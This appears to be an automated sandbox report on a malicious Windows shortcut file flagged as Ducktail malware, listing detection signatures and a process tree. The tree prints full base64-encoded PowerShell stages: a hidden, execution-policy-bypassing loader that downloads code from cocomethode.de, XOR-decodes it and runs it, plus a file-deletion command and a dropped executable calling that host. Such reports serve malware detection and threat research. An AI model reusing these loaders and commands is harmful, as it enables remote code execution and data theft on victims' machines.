Edit tour

Windows Analysis Report
MdmRznA6gx.lnk

Overview

General Information

Sample name:	MdmRznA6gx.lnk
Analysis ID:	1573018
MD5:	e436af2f8e08b4ebd7335a75005c2355
SHA1:	59350c5f14c8e94dd49fa609abca2ed7c2cd8182
SHA256:	df588335b83c2dc3f5877573821d9345b2cba4b80ade65e940bc065846c9c82c
Infos:

Detection

Ducktail

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Ducktail

Yara detected Powershell download and execute

Allows multiple concurrent remote connection

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Modifies security policies related information

PowerShell case anomaly found

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: PowerShell Base64 Encoded WMI Classes

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64native

cmd.exe (PID: 5756 cmdline: "C:\Windows\system32\cmd.exe" /v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7808 cmdline: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 8388 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8412 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2347.tmp" "c:\Users\user\AppData\Local\Temp\oho2nqxk\CSC33DBF5592E3045FEA3FE203350D9DA4A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 8528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WINWORD.EXE (PID: 8800 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)

cmd.exe (PID: 8840 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA== MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8900 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sppsvc.exe (PID: 4736 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)

svczHost.exe (PID: 6580 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 cocomethode.de MD5: 9298A0077E8353244A38CAEFE43AF4CB)

conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5400 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5072 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 1884 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 4092 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBz